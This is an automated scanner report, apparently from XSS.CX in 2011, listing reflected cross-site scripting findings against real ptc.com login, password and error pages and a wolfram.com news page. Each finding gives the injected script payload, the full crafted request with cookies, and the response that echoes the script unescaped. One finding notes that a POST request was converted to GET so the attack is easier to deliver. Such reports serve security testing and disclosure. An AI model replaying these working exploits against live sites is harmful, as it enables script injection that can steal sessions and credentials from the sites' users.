User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:29 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=68811D3A5B6F3C8E8AF7DE881222BD57.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44097
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:54 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>5b73a0137ec-->
...[SNIP]...

1.53. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d37d6"><script>alert(1)</script>d017caaff81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/product-lifecycle-managementd37d6"><script>alert(1)</script>d017caaff81/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:25 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=2D4D5AE6D0B0507A26D6EDD6625536ED.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:50 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions/product-lifecycle-managementd37d6"><script>alert(1)</script>d017caaff81">
...[SNIP]...

1.54. https://www.ptc.com/appserver/common/account/password.jsp [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ptc.com
Path:	/appserver/common/account/password.jsp

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 203b6<script>alert(1)</script>f6446aa7f8f8b5a43 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /appserver/common/account/password.jsp?numTries=3&uid=xss203b6<script>alert(1)</script>f6446aa7f8f8b5a43 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.ptc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.ptc.com/appserver/common/account/password.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; JSESSIONID=2D0C96AD12D9D3C0D09DD30EDCDF94C0.hqjbsprd07-e; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturncanSubmit%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:05 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:30 GMT;path=/;secure
Content-Length: 31046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<link rel='stylesheet' href='/common/css/apps/wam.css' type='text/css'/>
<scri
...[SNIP]...
<b>xss203b6<script>alert(1)</script>f6446aa7f8f8b5a43</b>
...[SNIP]...

1.55. https://www.ptc.com/appserver/common/login/ssl/login.jsp [dest parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ptc.com
Path:	/appserver/common/login/ssl/login.jsp

Issue detail

The value of the dest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d5d"><script>alert(1)</script>2dd33bf20e6 was submitted in the dest parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaqd2d5d"><script>alert(1)</script>2dd33bf20e6&msg=1 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:46 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:11 GMT;path=/;secure
Content-Length: 35409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com: Log In</titl
...[SNIP]...
rm-urlencoded" action="/appserver/auth/authenticate.jsp?dest=http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faqd2d5d"><script>alert(1)</script>2dd33bf20e6" name="secureLogin">
...[SNIP]...

1.56. https://www.ptc.com/appserver/common/login/ssl/login.jsp [msg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ptc.com
Path:	/appserver/common/login/ssl/login.jsp

Issue detail

The value of the msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee82"><script>alert(1)</script>212e8cc256d was submitted in the msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=11ee82"><script>alert(1)</script>212e8cc256d HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:46 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:11 GMT;path=/;secure
Content-Length: 35366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com: Log In</titl
...[SNIP]...
<input type="hidden" name="msg" value="11ee82"><script>alert(1)</script>212e8cc256d" />
...[SNIP]...

1.57. https://www.ptc.com/appserver/common/login/ssl/login.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ptc.com
Path:	/appserver/common/login/ssl/login.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254dc"><script>alert(1)</script>0846d0c8ba8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=1&254dc"><script>alert(1)</script>0846d0c8ba8=1 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:55 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=36
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:20 GMT;path=/;secure
Content-Length: 35407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com: Log In</titl
...[SNIP]...
<input type="hidden" name="254dc"><script>alert(1)</script>0846d0c8ba8" value="1" />
...[SNIP]...

1.58. https://www.ptc.com/appserver/common/login/ssl/login.jsp [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ptc.com
Path:	/appserver/common/login/ssl/login.jsp

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 8c97c<script>alert(1)</script>e6dbcc88380 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=4&uid=xss8c97c<script>alert(1)</script>e6dbcc88380 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; JSESSIONID=2D0C96AD12D9D3C0D09DD30EDCDF94C0.hqjbsprd07-e; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Account%20Login%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DAccount%252520Login%252520Page%2526pidt%253D1%2526oid%253DLog%252520In%2526oidt%253D3%2526ot%253DSUBMIT; NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:07 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=18
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:32 GMT;path=/;secure
Content-Length: 35547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com Account Not A
...[SNIP]...
<b>xss8c97c<script>alert(1)</script>e6dbcc88380</b>
...[SNIP]...

1.59. https://www.ptc.com/appserver/common/login/ssl/login.jsp [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ptc.com
Path:	/appserver/common/login/ssl/login.jsp

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec4f7"><script>alert(1)</script>692868cf3d5 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=4&uid=xssec4f7"><script>alert(1)</script>692868cf3d5 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; JSESSIONID=2D0C96AD12D9D3C0D09DD30EDCDF94C0.hqjbsprd07-e; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Account%20Login%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DAccount%252520Login%252520Page%2526pidt%253D1%2526oid%253DLog%252520In%2526oidt%253D3%2526ot%253DSUBMIT; NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:06 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:31 GMT;path=/;secure
Content-Length: 35551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com Account Not A
...[SNIP]...
<input type="hidden" name="uid" value="xssec4f7"><script>alert(1)</script>692868cf3d5" />
...[SNIP]...

1.60. http://www.wolfram.com/news/mathcad.html [name of an arbitrarily supplied request parameter] previous

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfram.com
Path:	/news/mathcad.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b9c"><script>alert(1)</script>c6d903096a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/mathcad.html?a9b9c"><script>alert(1)</script>c6d903096a9=1 HTTP/1.1
Host: www.wolfram.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=control+systems#pq=control+systems&hl=en&cp=5&gs_id=j&xhr=t&q=mathcad&qe=bWF0aGM&qesig=9TbiipYEAZC7WKi55YxjrA&pkc=AFgZ2tmlRroTZvj-GFJ1NJj2q1NtSwFvzq-YtVc3ZLoxwmQ5jKvDaOxkolP84m3mPcjigrxMpDIDTrPXBn6AXtc6rAwuw7c2Bg&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=mathc&aq=0&aqi=g3g-s1&aql=&gs_sm=&gs_upl=&fp=1&biw=1630&bih=1004&bav=on.2,or.r_gc.r_pw.,cf.osb&cad=b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:42 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2008 16:28:48 GMT
ETag: "9c4-48a45d40"
Content-Type: text/html
Content-Length: 29144

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Mathematica Imports Mathcad Documents</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<a href="/news/mathcad.html?a9b9c"><script>alert(1)</script>c6d903096a9=1;print_this_page=1" class="sblinkutil" target="_blank">
...[SNIP]...

Report generated by XSS.CX at Mon Oct 03 15:20:12 CDT 2011.